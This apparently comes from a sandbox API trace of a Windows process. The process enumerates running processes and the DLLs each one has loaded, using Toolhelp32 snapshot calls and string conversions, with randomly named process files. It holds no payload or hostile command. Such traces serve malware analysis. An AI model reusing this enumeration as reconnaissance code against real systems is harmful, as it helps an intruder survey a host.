	[0106.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.830] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.831] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.832] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 0
	[0106.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 30
	[0106.832] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bracket-natural-chancellor.exe")) returned 1
	[0106.833] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xc28) returned 0x888
	[0106.840] Module32FirstW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.841] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.842] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.843] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.843] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.844] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.845] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.846] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.846] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.847] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.862] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.862] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.863] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.864] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.865] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.866] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.866] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.867] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.868] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 0
	[0106.869] Module32FirstW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\MSBuild\\bracket-natural-chancellor.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\MSBuild\\bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 56
	[0106.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 31
	[0106.869] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.870] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0106.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0106.871] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0106.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0106.872] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.873] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.874] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.875] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0106.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0106.875] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.876] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.877] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.878] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.879] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.880] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0106.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0106.881] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0106.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0106.881] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.882] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.883] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 1
	[0106.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.884] Module32NextW (hSnapshot=0x888, lpme=0x20af280) returned 0
	[0106.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 31
	[0106.885] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="safari.exe")) returned 1
	[0106.886] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xc3c) returned 0x88c
	[0106.894] Module32FirstW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.894] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.895] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.910] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.911] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.912] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.912] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.913] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.914] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.915] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.915] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.916] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.917] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.918] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.918] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.919] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.920] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.921] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.921] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 0
	[0106.922] Module32FirstW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\MSECache\\safari.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\MSECache\\safari.exe", lpUsedDefaultChar=0x0) returned 43
	[0106.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 11
	[0106.923] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.924] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0106.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0106.925] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0106.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0106.925] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.926] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.927] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.928] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0106.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0106.929] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.930] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
